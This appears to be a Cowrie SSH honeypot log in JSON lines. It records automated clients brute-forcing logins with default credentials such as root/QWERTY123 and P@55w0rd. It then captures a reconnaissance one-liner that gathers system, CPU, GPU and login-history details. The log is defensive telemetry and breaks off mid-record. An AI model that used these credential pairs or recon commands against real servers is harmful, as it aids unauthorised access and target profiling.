{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:48.472401Z","src_ip":"212.227.125.160","session":"bb2b46c29a3e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:48.473072Z","src_ip":"212.227.125.160","session":"bb2b46c29a3e"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:53:49.014502Z","src_ip":"212.227.125.160","session":"bb2b46c29a3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:53:49.135423Z","src_ip":"212.227.125.160","session":"bb2b46c29a3e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:53:49.136089Z","src_ip":"212.227.125.160","session":"bb2b46c29a3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:49.191294Z","src_ip":"212.227.125.160","session":"bb2b46c29a3e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:49.192353Z","src_ip":"212.227.125.160","session":"bb2b46c29a3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47492,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6f291c76120","protocol":"ssh","message":"New connection: 212.227.125.160:47492 (1.2.3.4:22) [session: e6f291c76120]","sensor":"my-vps","timestamp":"2025-08-26T11:53:54.498272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:54.511955Z","src_ip":"212.227.125.160","session":"e6f291c76120"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:54.582598Z","src_ip":"212.227.125.160","session":"e6f291c76120"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38460,"dst_ip":"1.2.3.4","dst_port":22,"session":"aede1447cede","protocol":"ssh","message":"New connection: 196.251.86.249:38460 (1.2.3.4:22) [session: aede1447cede]","sensor":"my-vps","timestamp":"2025-08-26T11:53:55.724986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:56.303305Z","src_ip":"196.251.86.249","session":"aede1447cede"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:53:56.304040Z","src_ip":"196.251.86.249","session":"aede1447cede"}
{"eventid":"cowrie.login.failed","username":"pufferpanel","password":"pufferpanel","message":"login attempt [pufferpanel/pufferpanel] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:56.980217Z","src_ip":"212.227.125.160","session":"e6f291c76120"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:58.395552Z","src_ip":"212.227.125.160","session":"e6f291c76120"}
{"eventid":"cowrie.login.failed","username":"git","password":"password123","message":"login attempt [git/password123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:58.588931Z","src_ip":"196.251.86.249","session":"aede1447cede"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43712,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d3c6ff5825d","protocol":"ssh","message":"New connection: 83.168.105.65:43712 (1.2.3.4:22) [session: 6d3c6ff5825d]","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.167006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.167634Z","src_ip":"83.168.105.65","session":"6d3c6ff5825d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.208246Z","src_ip":"83.168.105.65","session":"6d3c6ff5825d"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.333375Z","src_ip":"83.168.105.65","session":"6d3c6ff5825d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:53:59.474264Z","src_ip":"83.168.105.65","session":"6d3c6ff5825d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.475088Z","src_ip":"83.168.105.65","session":"6d3c6ff5825d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36876,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c8235cb97a0","protocol":"ssh","message":"New connection: 212.227.235.229:36876 (1.2.3.4:22) [session: 6c8235cb97a0]","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.476934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.477845Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.516678Z","src_ip":"83.168.105.65","session":"6d3c6ff5825d"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:59.517794Z","src_ip":"83.168.105.65","session":"6d3c6ff5825d"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:00.159762Z","src_ip":"196.251.86.249","session":"aede1447cede"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:54:00.354929Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48264,"dst_ip":"1.2.3.4","dst_port":22,"session":"29781d1edb73","protocol":"ssh","message":"New connection: 212.227.125.160:48264 (1.2.3.4:22) [session: 29781d1edb73]","sensor":"my-vps","timestamp":"2025-08-26T11:54:00.971087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:00.972050Z","src_ip":"212.227.125.160","session":"29781d1edb73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.022953Z","src_ip":"212.227.125.160","session":"29781d1edb73"}
{"eventid":"cowrie.login.failed","username":"systemd","password":"systemd","message":"login attempt [systemd/systemd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.177229Z","src_ip":"212.227.125.160","session":"29781d1edb73"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.329126Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:54:01.872635Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.873539Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.874181Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.875263Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.876772Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.877654Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.878473Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.879707Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.880466Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.881238Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.881873Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.882372Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:54:01.883008Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:54:02.119704Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:02.120743Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:02.122048Z","src_ip":"212.227.235.229","session":"6c8235cb97a0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:02.228801Z","src_ip":"212.227.125.160","session":"29781d1edb73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49030,"dst_ip":"1.2.3.4","dst_port":22,"session":"5064d79596b1","protocol":"ssh","message":"New connection: 212.227.125.160:49030 (1.2.3.4:22) [session: 5064d79596b1]","sensor":"my-vps","timestamp":"2025-08-26T11:54:08.047490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:08.159948Z","src_ip":"212.227.125.160","session":"5064d79596b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.